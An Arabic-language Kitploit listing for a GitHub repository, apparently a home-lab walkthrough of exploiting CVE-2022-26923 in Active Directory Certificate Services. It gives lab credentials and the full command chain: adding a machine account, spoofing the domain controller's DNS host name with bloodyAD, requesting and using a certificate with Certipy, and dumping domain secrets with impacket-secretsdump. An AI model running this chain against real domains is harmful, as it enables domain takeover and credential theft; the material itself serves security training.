Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-26923-rayng — استغلال لـ CVE-2022-26923 | Kitploit
أدوات/GitHubGitHub/rayngnpc/cve-2022-26923-rayng
كسر كلمات المرورتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالمصادقةالتعلم والتعليممختبرات وتدريب عملي
GitHubrayngnpc/cve-2022-26923-rayng

CVE-2022-26923-rayng

استغلال لـ CVE-2022-26923

عرض المستودع
4منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال CVE-2022-26923: تصعيد صلاحيات سلطة الشهادات

نظرة عامة

CVE-2022-26923 هي ثغرة أمنية في خدمات شهادات Active Directory (AD CS) تسمح للمهاجم بتصعيد الصلاحيات عن طريق إساءة استخدام المصادقة القائمة على الشهادات. يوضح هذا الدليل الخطوات اللازمة لاستغلال هذه الثغرة باستخدام Impacket و Certipy.


جدول بيانات الاعتماد

الجهاز الافتراضياسم المستخدمكلمة المرور
Windows ServerAdministrator!@windowsadmintest101
Windows Servertestuser$Vulnerable139
Kali-Linux VMvagrantvagrant

الخطوة 1: استنساخ المستودع وإعداد الآلات الافتراضية

أولاً، قم باستنساخ المستودع الذي يحتوي على الملفات اللازمة:

root@kitploit:~
git clone https://github.com/rayngnpc/CVE-2022-26923-rayng.git
cd CVE-2022-26923-rayng

إعداد الآلات الافتراضية

يحتوي المستودع على مجلدين، كل منهما يحتوي على ملف Vagrantfile لتوفير الآلات الافتراضية. يجب عليك تثبيت Vagrant على جهازك المضيف قبل المتابعة.

تثبيت Vagrant

لنظام ويندوز

قم بتنزيل وتثبيت Vagrant من هنا. أو قم بالتثبيت باستخدام PowerShell:

root@kitploit:~
choco install vagrant
لنظام لينكس
root@kitploit:~
sudo apt update && sudo apt install vagrant -y

Windows Server 2022 VM

انتقل إلى المجلد WindowsServer2022:

root@kitploit:~
cd WindowsServer2022
vagrant up

سيؤدي هذا إلى تنزيل وإعداد Windows Server 2022 VM في VirtualBox.

Kali Linux VM

انتقل إلى المجلد Kali-LinuxVM:

root@kitploit:~
cd Kali-LinuxVM
vagrant up

الخطوة 2: تكوين الشبكة الافتراضية

نظرًا لأن الاستغلال يتطلب شبكة NAT، فقم بتكوين VirtualBox على النحو التالي:

على نظام ويندوز

قبل تشغيل الأمر أدناه، تأكد من إضافة VBoxManage إلى متغيرات البيئة الخاصة بك. إذا لم يكن كذلك، فقم بتنفيذ الأمر باستخدام مساره الكامل:

إضافة شبكة NAT

root@kitploit:~
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

إذا لم يتم التعرف على VBoxManage، استخدم:

root@kitploit:~
"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

على نظام لينكس

root@kitploit:~
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

تأكد من التحقق من كلا الجهازين الافتراضيين في VirtualBox والتأكد من تعيينهما لمحول الشبكة NatNetwork - NatNet1.

يمكنك إنشاء شبكة NAT باسم مختلف، ولكن يجب أن تكون في نطاق IP 10.0.2.0/24.


الخطوة 3: تعديل ملف المضيفين

قبل المتابعة، تأكد من تشغيل كل من Windows Server 2022 و Kali Linux VM.

قم بالوصول إلى آلة Kali Linux الافتراضية لبدء الهجوم.

قم بتحديث ملف /etc/hosts الخاص بك لربط IP وحدة التحكم بالمجال:

root@kitploit:~
sudo nano /etc/hosts

أضف الإدخال التالي:

root@kitploit:~
10.0.2.121 SERVER2022.pchau.domain.local SERVER2022 pchau-SERVER2022-CA pchau.domain.local

احفظ واخرج.


الخطوة 4: إعداد البيئة

انتقل إلى المجلد CVE-26923 وقم بتفعيل البيئة الافتراضية لـ Python:

root@kitploit:~
cd ~/CVE-26923
source ~/CVE-26923/rayng/bin/activate

الخطوة 5: إضافة جهاز كمبيوتر إلى المجال

باستخدام أداة addcomputer من Impacket:

root@kitploit:~
impacket-addcomputer -computer-name 'PCTEST1' -computer-pass 'testuser' -dc-host 10.0.2.121 -domain-netbios pchau.domain.local pchau.domain.local/testuser:'$Vulnerable139'

الخطوة 6: تعيين PCTEST1 إلى وحدة التحكم بالمجال

الطريقة 1: باستخدام SSH (إذا كان OpenSSH مثبتًا على الخادم الهدف)

root@kitploit:~
ssh [email protected]
Get-ADComputer PCTEST1 -properties dnshostname,serviceprincipalname
Set-ADComputer PCTEST1 -DnsHostName SERVER2022.pchau.domain.local
Get-ADComputer PCTEST1 -properties dnshostname,serviceprincipalname

الطريقة 2: بدون SSH (باستخدام Impacket و BloodyAD)

التحقق من أجهزة الكمبيوتر في المجال:

root@kitploit:~
impacket-GetADComputers pchau.domain.local/testuser:'$Vulnerable139' -dc-ip 10.0.2.121

انتقل إلى المجلد bloodyAD واستخدم bloodyAD.py لإضافة PCTEST1 إلى المجال:

root@kitploit:~
cd ~/CVE-26923/bloodyAD/
python3 bloodyAD.py -d pchau.domain.local -u testuser -p '$Vulnerable139' --host 10.0.2.121 set object PCTEST1$ dNSHostName -v 'SERVER2022.pchau.domain.local'

تحقق من تعيين PCTEST1 للمجال:

root@kitploit:~
impacket-GetADComputers pchau.domain.local/testuser:'$Vulnerable139' -dc-ip 10.0.2.121

الخطوة 7: عملية الاستغلال

العثور على الشهادات القابلة للاستغلال

استخدم Certipy للعثور على الشهادات القابلة للاستغلال:

root@kitploit:~
certipy find -dc-ip 10.0.2.121 -username 'PCTEST1$' -password 'testuser'

طلب شهادة

اطلب شهادة جهاز باستخدام Certipy:

root@kitploit:~
certipy req -dc-ip 10.0.2.121 -username 'PCTEST1$' -password 'testuser' -template Machine -ca pchau-SERVER2022-CA

المصادقة باستخدام الشهادة

المصادقة باستخدام الشهادة التي تم الحصول عليها:

root@kitploit:~
certipy auth -pfx server2022.pfx

الخطوة 8: استخراج تجزئات NTLM

بعد تشغيل أمر certipy auth، سيتم عرض تجزئتين. سيتم استخدام التجزئة اليمنى لمصادقة NTLM.

مثال لإخراج التجزئة:

root@kitploit:~
aad3b435b51404eeaad3b435b51404ee:69079fd4946af567d682d61e121f29e7

استخدم تجزئة NTLM المستخرجة لتفريغ بيانات الاعتماد:

root@kitploit:~
impacket-secretsdump '[email protected]' -hashes :69079fd4946af567d682d61e121f29e7

يكمل هذا سلسلة الهجوم الكاملة لاستغلال CVE-2022-26923.

تنزيل الأداة